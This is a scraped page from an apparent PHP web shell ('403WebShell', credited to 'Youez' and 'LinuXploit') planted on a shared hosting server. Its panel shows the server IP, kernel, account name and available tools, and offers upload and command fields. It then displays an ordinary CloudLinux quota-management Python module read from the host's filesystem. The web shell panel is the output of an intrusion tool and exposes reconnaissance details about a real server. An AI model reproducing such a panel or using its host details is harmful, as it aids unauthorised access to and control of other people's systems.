Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.21.12.122
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/cllimits/clquota_lib.py
# -*- coding: utf-8 -*-

# clquota.py - module for interfacing with cl-quota utility for get/set user's quotas
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import json
from typing import Dict, Optional, Tuple

from clcommon.clexception import FormattedException
from clcommon.utils import ExternalProgramFailed, run_command
from cllimits.lib import exec_utility
from cllimits.lib.utils import is_quota_active, is_quota_supported


class ClQuotaException(FormattedException):
    pass


class UnexpectedClQuotaError(ClQuotaException):
    """
    Raised when we get output from cl-quota
    that cannot be parsed properly.
    """
    def __init__(self, raw_response=None):
        broken_exc_message = {'message': "Unexpected response got from %(util)s. "
                                         "Raw response from cl-quota: '%(raw_response)s'."
                                         "Please, contact CloudLinux support for help in resolving this issue.",
                              'context': {'util': 'Quota', 'raw_response': raw_response}}
        super().__init__(broken_exc_message)


class QuotaDisabledException(ClQuotaException):
    """
    Raised when quotas are disabled in system globally.
    """
    def __init__(self):
        disabled_exc_message = {'message': "%(util)s is disabled",
                                'context': {'util': 'Quota'}}
        super().__init__(disabled_exc_message)


class ClQuotaLib:
    _CL_QUOTA_PATH = '/usr/bin/cl-quota'
    _REPQUOTA_PATH = '/usr/sbin/repquota'

    def __init__(self):
        # inodes limits data
        # uid --> (soft_limit, hard_limit)
        self._inode_user_limits: Optional[Dict[str, Tuple[str, str]]] = None
        self._inode_package_dict: Optional[Dict[str, Tuple[str, str]]] = None
        # Check if quota is supported
        self._is_clquota_present = None
        # Check if quota is activated
        self._is_clquota_activated = None

    def is_clquota_present(self):
        """
        Get quota presence flag
        :return: True/False - quotas present/not present
        """
        if self._is_clquota_present is None:
            self._is_clquota_present = is_quota_supported(self._CL_QUOTA_PATH, self._REPQUOTA_PATH)
        return self._is_clquota_present

    def is_clquota_activated(self):
        """
        Get quota activated flag
        :return: True/False - quotas activeted/not activeted
        """
        if self._is_clquota_activated is None:
            self._is_clquota_activated = is_quota_active(self._CL_QUOTA_PATH, self._REPQUOTA_PATH)
        return self._is_clquota_activated

    def get_inodes_limits_by_uid(self, user_id):
        """
        Retrive inodes limits by uid
        :param user_id: Supplied uid
        :return: cortege (soft_limit, hard_limit). (None, None) if governor not present or error
        """
        # Load inodes data if need
        self._load_users_info()
        uid = str(user_id)
        if uid in self._inode_user_limits:
            return self._inode_user_limits[uid]
        return self._inode_user_limits['0']

    def set_user_inodes_limits(self, uid, limits, force=False):
        """
        Set inodes limits for user uid
        :param: int uid: user id
        :param: list limits: new inodes limits
        :param: bool force: save limits if even they are equal to defaults
        :return: None
        """
        self._load_users_info()
        if not isinstance(uid, int) or uid < 0:
            exc_message = {'message': "User id '%(uid)s' isn't a positive integer",
                           'context': {'uid': uid}}
            raise ClQuotaException(exc_message)
        if limits == "unlimited":
            limits = ["unlimited"] * 2
        elif limits == "default":
            limits = ["default"] * 2
        else:
            if type(limits) in [tuple, list]:
                pass
            elif len(limits.split(',')) == 2:
                limits = limits.split(',')
            else:
                exc_message = {'message': "Limits %(limits)s aren't acceptable.",
                               'context': {'limits': limits}}
                raise ClQuotaException(exc_message)

            for limit in limits:
                try:
                    if limit != "default":
                        limit = int(limit)
                        if limit < 0:
                            raise ValueError()
                except ValueError as e:
                    exc_message = {'message': "Limit value '%(limit)s' isn't a positive integer or string %(default)s",
                                   'context': {'limit': limit, 'default': 'default'}}
                    raise ClQuotaException(exc_message) from e
        cmd = [self._CL_QUOTA_PATH,
               f'--user-id={uid}',
               f'--soft-limit={limits[0]}',
               f'--hard-limit={limits[1]}']
        if force:
            cmd.append("--force")
        try:
            run_command(cmd)
        except ExternalProgramFailed as e:
            raise ClQuotaException(str(e)) from e

    def set_user_inodes_limits_unlimited(self, uid):
        """
        Set unlimited inodes limits for user uid
        :param: int uid: user id
        :return: None
        """
        self.set_user_inodes_limits(uid, "unlimited")

    def reset_user_inodes_limits(self, uid):
        """
        Set default inodes limits for user uid
        :param: int uid: user id
        :return: None
        """
        self.set_user_inodes_limits(uid, "default")

    def _load_users_info(self):
        """
        Loads users info from cl-quota
        :return: None
        """
        # Exit if cl-quota data already loaded
        if self._inode_user_limits is not None:
            return
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise QuotaDisabledException()
        try:
            data = self._get_quotas(['--json'])
        except ClQuotaException:
            self._inode_user_limits = None
            raise
        self._inode_user_limits = {}
        for uid, limits in data.items():
            self._inode_user_limits[uid] = (int(limits[1][1]), int(limits[2][1]))

        if '0' not in self._inode_user_limits:
            self._inode_user_limits = None
            exc_message = {'message': "There is no %(what)s found in %(where)s",
                           'context': {'what': 'default settings', 'where': f'{self._CL_QUOTA_PATH} output'}}
            raise ClQuotaException(exc_message)

    def _get_quotas(self, command):
        # Get all cl-quota limits and parse them to self._inodes_limits
        _, s_quota_limits = exec_utility(self._CL_QUOTA_PATH, command)
        try:
            data = json.loads(s_quota_limits)
        except (TypeError, ValueError) as e:
            raise UnexpectedClQuotaError(raw_response=s_quota_limits) from e
        if not data:
            raise UnexpectedClQuotaError()

        if data['result'] != 'success':
            raise ClQuotaException({
                'message': data['result'],
                'context': data.get('context', {}),
                'details': data.get('details')
            })
        return data['items']

    def reset_inodes_limits(self):
        """
        Reset inodes limits for all users to package limits
        :return:
        """
        if not self.is_clquota_present() or not self.is_clquota_activated():
            return
        exec_utility(self._CL_QUOTA_PATH, ['--sync'])

    def _load_packages_info(self):
        """
        Loads packages info from cl-quota
        :return: None
        """
        # Exit if cl-quota data already loaded
        if self._inode_package_dict is not None:
            return
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise QuotaDisabledException()
        try:
            packages = self._get_quotas(['--json', '--all-package-limits'])
        except ClQuotaException:
            self._inode_package_dict = None
            raise
        self._inode_package_dict = {}
        for package, limits in packages.items():
            soft_limit = limits[1][1]
            if soft_limit == '-':
                soft_limit = 0
            else:
                soft_limit = int(soft_limit)

            hard_limit = limits[2][1]
            if hard_limit == '-':
                hard_limit = 0
            else:
                hard_limit = int(hard_limit)
            self._inode_package_dict[package] = {'soft': soft_limit, 'hard': hard_limit}

    def get_reseller_package_limits(self, package_name_arg):
        """
        Get inodes limits for supplied reseller and package
        :param package_name_arg: Package name. Only if reseller name is provided. If None - all packages
        :return: Packages limits dictionary: {package_name: { "soft": 100000, "hard": 200000 } }
        If package with supplied name not found, dictionary will be empty
        """
        self._load_packages_info()
        if not package_name_arg:
            # if package name not provided - return all packages
            return self._inode_package_dict
        # Package name provided
        if package_name_arg in self._inode_package_dict:
            return {package_name_arg: self._inode_package_dict[package_name_arg]}
        return {}

    def __set_error(self, param, package_name, err):
        return {'message': "%(what)s set error for package=%(package)s%(error)s",
                'context': {'what': param, 'package': package_name,
                            'error': f" [{err}]" if err else ""}}

    def set_reseller_package_limits(self, package_name, limits_to_set):
        """
        Set inodes limits for package
        Called from cloudlinux-packages set
        :param package_name: Package name
        :param limits_to_set: Limits to set: soft_limit,hard_limit
        :return: None
        """
        disabled_exc_message = {'message': "%(util)s is disabled",
                                'context': {'util': 'Quota'}}
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise ClQuotaException(disabled_exc_message)
        limits = limits_to_set.split(',')
        if len(limits) != 2:
            # Argument error
            raise ClQuotaException({'message': "%(util)s argument error",
                                    'context': {'util': 'cl-quota'}})
        # set quotas limits
        cl_quota_cmd = [f'--package={package_name}',
                        f'--soft-limit={limits[0]}',
                        f'--hard-limit={limits[1]}']
        ret_code, stdout = exec_utility(self._CL_QUOTA_PATH, cl_quota_cmd)
        if ret_code != 0 or stdout:
            # Set limits error
            raise ClQuotaException(self.__set_error('Inodes limits', package_name, stdout))

    def set_package_limits_independently(self, package_name, limits):
        """
        Set inodes limits for package
        Called from cl-syncpkgs
        :param package_name: Package name
        :param limits: Limits to set: {"inodes_soft":1000, "inodes_hard":2000}
        :return: None
        """
        disabled_exc_message = {'message': "Quota is disabled"}
        # Exit if cl-quota not present or cl-quota error
        if not self.is_clquota_present() or not self.is_clquota_activated():
            raise ClQuotaException(disabled_exc_message)
        if len(limits) == 0:
            raise ClQuotaException({'message': "Unspecified limits for cl-quota"})
        if not set(limits) <= {'inodes_soft', 'inodes_hard'}:
            bad_limits = set(limits) - {'inodes_soft', 'inodes_hard'}
            raise ClQuotaException({'message': "Incorrect limits for cl-quota: %(bad_limits)s",
                                    'context': {'bad_limits': ', '.join(bad_limits)}})
        cl_quota_cmd = [f'--package={package_name}']
        if 'inodes_soft' in limits:
            cl_quota_cmd.append(f"--soft-limit={limits['inodes_soft']}")
        if 'inodes_hard' in limits:
            cl_quota_cmd.append(f"--hard-limit={limits['inodes_hard']}")
        ret_code, stdout = exec_utility(self._CL_QUOTA_PATH, cl_quota_cmd)
        if ret_code != 0 or stdout:
            raise ClQuotaException(self.__set_error('Inodes limits', package_name, stdout))

Youez - 2016 - github.com/yon3zu
LinuXploit